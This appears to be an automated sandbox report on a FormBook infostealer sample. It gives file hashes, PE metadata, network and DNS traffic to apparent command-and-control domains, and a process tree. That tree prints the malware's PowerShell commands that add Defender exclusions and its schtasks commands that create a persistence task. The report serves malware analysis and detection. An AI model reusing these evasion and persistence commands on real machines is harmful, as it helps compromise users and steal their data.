Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Download File

Process:	C:\Users\user\Desktop\FGGx944Qu7.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	758280
Entropy (8bit):	7.978851063770012
Encrypted:	false
SSDEEP:	12288:CdrLbDZaNRp7+ur4n+Hriagc4UHQlb/xk/ouztXHUT5izyRnA37CB9CdkR:cLDZMRpQnari1c4NR/Wouzt3AkMnA+sA
MD5:	21D18E20B8B0E17E0B554B5940A7AAED
SHA1:	BAD65794A2BC8C23D373F82E11978F11AF1AF57D
SHA-256:	B600C43E2980691952532A79E7A0AEF2351AEEF6F740FD2F56647509C93B6DA0
SHA-512:	D08D0F4D86EABB1C1EC5CDA10675794C0A82E8574E2F5DCB5B56330FF6AFC5AAB94FFBE328B316038ADC5F810DF429D6B6A1DC7842280D3B6072C0F24FBCFCB1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62% Antivirus: Virustotal, Detection: 67%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ff..............0..8...".......W... ...`....@.. ....................................@..................................V..O....`...............\...6........................................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`... ...:..............@..@.reloc...............Z..............@..B.................V......H.......t?..X;......(....z................................................{...."..}........0.............(2...o........+......0........... @B...(2...o.....(....[.+......0..v........s.......{....o....o.....+4.o....t.......o.........(....( .....,...t....o!......o"...-....u........,...o#........+.............@Y.......0...........(@...oI....+...0............($....+...0............{....o%....+......0...........(@...oA....+...0............ .... .... ....(&....+....0.."...

C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\FGGx944Qu7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.978851063770012
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FGGx944Qu7.exe
File size:	758'280 bytes
MD5:	21d18e20b8b0e17e0b554b5940a7aaed
SHA1:	bad65794a2bc8c23d373f82e11978f11af1af57d
SHA256:	b600c43e2980691952532a79e7a0aef2351aeef6f740fd2f56647509c93b6da0
SHA512:	d08d0f4d86eabb1c1ec5cda10675794c0a82e8574e2f5dcb5b56330ff6afc5aab94ffbe328b316038adc5f810df429d6b6a1dc7842280d3b6072c0f24fbcfcb1
SSDEEP:	12288:CdrLbDZaNRp7+ur4n+Hriagc4UHQlb/xk/ouztXHUT5izyRnA37CB9CdkR:cLDZMRpQnari1c4NR/Wouzt3AkMnA+sA
TLSH:	B4F423DBAB74E121DA310F35E4F0AB0563724C948A5ED359A9F050D98E97FE0A7118CF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ff..............0..8...".......W... ...`....@.. ....................................@................................

File Icon


Icon Hash:	1fb3b1a50d818f8c

Static PE Info

General

Entrypoint:	0x4b570e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6646D806 [Fri May 17 04:07:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/11/2018 19:00:00 08/11/2021 18:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb56bc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb6000	0x1ecc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb5c00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb3714	0xb3800	7aeb3253edbbbe13f9349ed13a4771f0	False	0.9753587983112814	SysEx File -	7.9850458366692925	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb6000	0x1ecc	0x2000	fbd839ddcd3fbbcfef5b4728eca5bd52	False	0.7943115234375	data	7.26218700052124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	db433f0180eff3050b24cbe2b1f454f3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb6100	0x1725	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.939915611814346
RT_GROUP_ICON	0xb7838	0x14	data	1.05
RT_VERSION	0xb785c	0x470	data	0.4234154929577465
RT_MANIFEST	0xb7cdc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 19, 2024 08:05:40.644273996 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:05:41.632376909 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:05:43.632159948 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:05:47.632127047 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:05:55.647808075 CEST	49745	80	192.168.2.4	34.149.87.45
May 19, 2024 08:06:06.686194897 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.697779894 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:06.698401928 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.700943947 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.712096930 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:06.712138891 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:06.713218927 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.714392900 CEST	49754	80	192.168.2.4	172.67.140.176
May 19, 2024 08:06:06.726528883 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:06.726536036 CEST	80	49754	172.67.140.176	192.168.2.4
May 19, 2024 08:06:21.783179045 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:22.788397074 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:24.788537979 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.788404942 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.843334913 CEST	80	49758	199.59.243.225	192.168.2.4
May 19, 2024 08:06:28.843456030 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.845993042 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.898433924 CEST	80	49758	199.59.243.225	192.168.2.4
May 19, 2024 08:06:28.898443937 CEST	80	49758	199.59.243.225	192.168.2.4
May 19, 2024 08:06:28.898515940 CEST	49758	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:28.910650015 CEST	80	49758	199.59.243.225	192.168.2.4
May 19, 2024 08:06:31.369384050 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:32.382164001 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:34.397778988 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:34.410768032 CEST	80	49760	199.59.243.225	192.168.2.4
May 19, 2024 08:06:34.410866022 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:34.412725925 CEST	49760	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:34.420372009 CEST	80	49760	199.59.243.225	192.168.2.4
May 19, 2024 08:06:34.420394897 CEST	80	49760	199.59.243.225	192.168.2.4
May 19, 2024 08:06:36.948486090 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:37.960351944 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:39.960347891 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:43.991570950 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:51.991668940 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:06:59.010922909 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:07:00.023277998 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:07:02.038575888 CEST	49761	80	192.168.2.4	199.59.243.225
May 19, 2024 08:07:06.038486958 CEST	49761	80	192.168.2.4	199.59.243.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 19, 2024 08:05:39.581056118 CEST	64510	53	192.168.2.4	1.1.1.1
May 19, 2024 08:05:40.585340977 CEST	64510	53	192.168.2.4	1.1.1.1
May 19, 2024 08:05:40.638453960 CEST	53	64510	1.1.1.1	192.168.2.4
May 19, 2024 08:05:59.992341995 CEST	49195	53	192.168.2.4	1.1.1.1
May 19, 2024 08:06:00.992129087 CEST	49195	53	192.168.2.4	1.1.1.1
May 19, 2024 08:06:01.158293962 CEST	53	49195	1.1.1.1	192.168.2.4
May 19, 2024 08:06:06.668118000 CEST	62821	53	192.168.2.4	1.1.1.1
May 19, 2024 08:06:06.683228970 CEST	53	62821	1.1.1.1	192.168.2.4
May 19, 2024 08:06:21.760849953 CEST	63578	53	192.168.2.4	1.1.1.1
May 19, 2024 08:06:21.780852079 CEST	53	63578	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 19, 2024 08:05:39.581056118 CEST	192.168.2.4	1.1.1.1	0x3fa2	Standard query (0)	www.birthingwitht.com	A (IP address)	IN (0x0001)	false
May 19, 2024 08:05:40.585340977 CEST	192.168.2.4	1.1.1.1	0x3fa2	Standard query (0)	www.birthingwitht.com	A (IP address)	IN (0x0001)	false
May 19, 2024 08:05:59.992341995 CEST	192.168.2.4	1.1.1.1	0x64dd	Standard query (0)	www.birthingwitht.com	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:00.992129087 CEST	192.168.2.4	1.1.1.1	0x64dd	Standard query (0)	www.birthingwitht.com	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:06.668118000 CEST	192.168.2.4	1.1.1.1	0x1301	Standard query (0)	www.oobzxod2xn.cc	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:21.760849953 CEST	192.168.2.4	1.1.1.1	0xbad3	Standard query (0)	www.drapples.club	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 19, 2024 08:05:40.638453960 CEST	1.1.1.1	192.168.2.4	0x3fa2	No error (0)	www.birthingwitht.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:05:40.638453960 CEST	1.1.1.1	192.168.2.4	0x3fa2	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:05:40.638453960 CEST	1.1.1.1	192.168.2.4	0x3fa2	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:01.158293962 CEST	1.1.1.1	192.168.2.4	0x64dd	No error (0)	www.birthingwitht.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:06:01.158293962 CEST	1.1.1.1	192.168.2.4	0x64dd	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:06:01.158293962 CEST	1.1.1.1	192.168.2.4	0x64dd	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:06.683228970 CEST	1.1.1.1	192.168.2.4	0x1301	No error (0)	www.oobzxod2xn.cc		172.67.140.176	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:06.683228970 CEST	1.1.1.1	192.168.2.4	0x1301	No error (0)	www.oobzxod2xn.cc		104.21.54.171	A (IP address)	IN (0x0001)	false
May 19, 2024 08:06:21.780852079 CEST	1.1.1.1	192.168.2.4	0xbad3	No error (0)	www.drapples.club	94950.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
May 19, 2024 08:06:21.780852079 CEST	1.1.1.1	192.168.2.4	0xbad3	No error (0)	94950.bodis.com		199.59.243.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.oobzxod2xn.cc

www.drapples.club

Target ID:	0
Start time:	02:04:51
Start date:	19/05/2024
Path:	C:\Users\user\Desktop\FGGx944Qu7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FGGx944Qu7.exe"
Imagebase:	0xba0000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Analysis Process: powershell.exePID: 7344, Parent PID: 7252

General

Target ID:	1
Start time:	02:04:54
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Imagebase:	0xf90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7352, Parent PID: 7344

General

Target ID:	2
Start time:	02:04:54
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: powershell.exePID: 7400, Parent PID: 7252

General

Target ID:	3
Start time:	02:04:54
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Imagebase:	0xf90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7416, Parent PID: 7400

General

Target ID:	4
Start time:	02:04:54
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: schtasks.exePID: 7424, Parent PID: 7252

General

Target ID:	5
Start time:	02:04:55
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7480, Parent PID: 7424

General

Target ID:	6
Start time:	02:04:55
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: FGGx944Qu7.exePID: 7604, Parent PID: 7252

General

Target ID:	7
Start time:	02:04:55
Start date:	19/05/2024
Path:	C:\Users\user\Desktop\FGGx944Qu7.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\FGGx944Qu7.exe"
Imagebase:	0x370000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Analysis Process: FGGx944Qu7.exePID: 7620, Parent PID: 7252

General

Target ID:	8
Start time:	02:04:55
Start date:	19/05/2024
Path:	C:\Users\user\Desktop\FGGx944Qu7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FGGx944Qu7.exe"
Imagebase:	0xb30000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Analysis Process: TBsjWljiCpR.exePID: 7680, Parent PID: 1044

General

Target ID:	9
Start time:	02:04:57
Start date:	19/05/2024
Path:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
Imagebase:	0xc30000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs Detection: 67%, Virustotal, Browse
Reputation:	low
Has exited:	true

Analysis Process: WmiPrvSE.exePID: 7716, Parent PID: 752

General

Target ID:	10
Start time:	02:04:58
Start date:	19/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: schtasks.exePID: 7864, Parent PID: 7680

General

Target ID:	11
Start time:	02:05:03
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp"
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7872, Parent PID: 7864

General

Target ID:	12
Start time:	02:05:03
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: TBsjWljiCpR.exePID: 7908, Parent PID: 7680

General

Target ID:	13
Start time:	02:05:04
Start date:	19/05/2024
Path:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Imagebase:	0x570000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Analysis Process: usFxdnRPYjnb.exePID: 4460, Parent PID: 7620

General

Target ID:	15
Start time:	02:05:17
Start date:	19/05/2024
Path:	C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe"
Imagebase:	0xfa0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Analysis Process: SearchProtocolHost.exePID: 8040, Parent PID: 4460

General

Target ID:	16
Start time:	02:05:18
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\SearchProtocolHost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\SearchProtocolHost.exe"
Imagebase:	0x230000
File size:	340'992 bytes
MD5 hash:	727FE964E574EEAF8917308FFF0880DE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
